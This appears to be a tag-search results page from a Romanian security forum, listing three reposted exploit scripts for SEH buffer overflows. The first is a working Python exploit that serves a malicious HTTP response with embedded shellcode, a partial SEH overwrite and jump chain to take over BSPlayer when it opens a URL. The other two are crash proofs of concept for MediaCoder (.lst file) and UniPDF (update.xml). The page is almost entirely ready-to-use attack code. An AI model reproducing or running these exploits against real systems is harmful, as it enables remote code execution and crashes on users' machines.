Jump to content

Search the Community

Showing results for tags 'seh'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 3 results

  1. #!/usr/bin/python ''' Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL. In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full address and then used backward jumping to jump to a long jump that eventually land in my shellcode. Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try My twitter: @fady_osman My youtube: [url]https://www.youtube.com/user/cutehack3r[/url] ''' import socket import sys s = socket.socket() # Create a socket object if(len(sys.argv) < 3): print "[x] Please enter an IP and port to listen to." print "[x] " + sys.argv[0] + " ip port" exit() host = sys.argv[1] # Ip to listen to. port = int(sys.argv[2]) # Reserve a port for your service. s.bind((host, port)) # Bind to the port print "[*] Listening on port " + str(port) s.listen(5) # Now wait for client connection. c, addr = s.accept() # Establish connection with client. # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload. print(('[*] Sending the payload first time', addr)) c.recv(1024) #seh and nseh. buf = "" buf += "\xbb\xe4\xf3\xb8\x70\xda\xc0\xd9\x74\x24\xf4\x58\x31" buf += "\xc9\xb1\x33\x31\x58\x12\x83\xc0\x04\x03\xbc\xfd\x5a" buf += "\x85\xc0\xea\x12\x66\x38\xeb\x44\xee\xdd\xda\x56\x94" buf += "\x96\x4f\x67\xde\xfa\x63\x0c\xb2\xee\xf0\x60\x1b\x01" buf += "\xb0\xcf\x7d\x2c\x41\xfe\x41\xe2\x81\x60\x3e\xf8\xd5" buf += "\x42\x7f\x33\x28\x82\xb8\x29\xc3\xd6\x11\x26\x76\xc7" buf += "\x16\x7a\x4b\xe6\xf8\xf1\xf3\x90\x7d\xc5\x80\x2a\x7f" buf += "\x15\x38\x20\x37\x8d\x32\x6e\xe8\xac\x97\x6c\xd4\xe7" buf += "\x9c\x47\xae\xf6\x74\x96\x4f\xc9\xb8\x75\x6e\xe6\x34" buf += "\x87\xb6\xc0\xa6\xf2\xcc\x33\x5a\x05\x17\x4e\x80\x80" buf += "\x8a\xe8\x43\x32\x6f\x09\x87\xa5\xe4\x05\x6c\xa1\xa3" buf += "\x09\x73\x66\xd8\x35\xf8\x89\x0f\xbc\xba\xad\x8b\xe5" buf += "\x19\xcf\x8a\x43\xcf\xf0\xcd\x2b\xb0\x54\x85\xd9\xa5" buf += "\xef\xc4\xb7\x38\x7d\x73\xfe\x3b\x7d\x7c\x50\x54\x4c" buf += "\xf7\x3f\x23\x51\xd2\x04\xdb\x1b\x7f\x2c\x74\xc2\x15" buf += "\x6d\x19\xf5\xc3\xb1\x24\x76\xe6\x49\xd3\x66\x83\x4c" buf += "\x9f\x20\x7f\x3c\xb0\xc4\x7f\x93\xb1\xcc\xe3\x72\x22" buf += "\x8c\xcd\x11\xc2\x37\x12" jmplong = "\xe9\x85\xe9\xff\xff" nseh = "\xeb\xf9\x90\x90" # Partially overwriting the seh record (nulls are ignored). seh = "\x3b\x58\x00\x00" buflen = len(buf) response = "\x90" *2048 + buf + "\xcc" * (6787 - 2048 - buflen) + jmplong + nseh + seh #+ "\xcc" * 7000 c.send(response) c.close() c, addr = s.accept() # Establish connection with client. # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload. print(('[*] Sending the payload second time', addr)) c.recv(1024) c.send(response) c.close() s.close() Source
  2. # Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst) # Date: 11/29/2010 # Author: Hadji Samir s-dz@hotmail.fr # Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe # Version: 0.8.33 build 5680 EAX 0012E788 ECX 43434343 EDX 00000000 EBX 43434343 ESP 0012E724 EBP 0012E774 ESI 0012E788 EDI 00000000 #!/usr/bin/python buffer = ("http://" + "A" * 845) nseh = ("B" * 4) seh = ("C" * 4) junk = ("D" * 60) f= open("exploit.lst",'w') f.write(buffer + nseh + seh + junk) f.close() Source: http://www.exploit-db.com/exploits/35531/
  3. # Exploit Title: UniPDF v1.1 BufferOverflow, SEH overwrite DoS PoC # Google Dork: [none] # Date: 01/28/2015 # Exploit Author: bonze # Email: dungvtr@gmail.com # Vendor Homepage: http://unipdf.com/ # Software Link: http://unipdf.com/file/unipdf-setup.exe (Redirect to: http://unipdf-converter.en.softonic.com/download) # Version: 1.1 # Tested on: Windows 7 SP1 EN # CVE : [none] # Note: # Function MultiByteToWideChar will overwrite RET and SEH pointer, but I can't make exception occur before StackCookie checking # Please tell me if you have any ideal #013E8012 |. 68 00020000 PUSH 200 ; /WideBufSize = 200 (512.) #013E8017 |. 8D8C24 9C0000> LEA ECX,DWORD PTR SS:[ESP+9C] ; | #013E801E |. 51 PUSH ECX ; |WideCharBuf #013E801F |. 52 PUSH EDX ; |StringSize #013E8020 |. 50 PUSH EAX ; |StringToMap #013E8021 |. 6A 00 PUSH 0 ; |Options #013E8023 |. 6A 00 PUSH 0 ; |CodePage = CP_ACP #013E8025 |. FF15 54B45101 CALL NEAR DWORD PTR DS:[<&KERNEL32.Multi> ; \MultiByteToWideChar #013E802B |. 8D87 08020000 LEA EAX,DWORD PTR DS:[EDI+208] # At Offset: 327-> overwrite nSEH # At Offset: 329-> overwrite SEH # badchar = 0x22 buff2 = "A" * 325 buff2+= "CC" # nSEH buff2+= "BB" # SEH crash2 = "<config>\n" crash2 += " <current Dat=\"1422420474\" />\n" crash2 += " <Dat Txt=\""+buff2+"\" />\n" crash2 += "</config>\n" # Copy file update.xml to UniPDF Application Folder and run UniPDF.exe file = open("update.xml","w") file.write(crash2) file.close() print "UniPDF v1.1 Crash PoC by bonze at FPT-IS" print "Email: dungvtr@gmail.com" print "File Created" Source
×
×
  • Create New...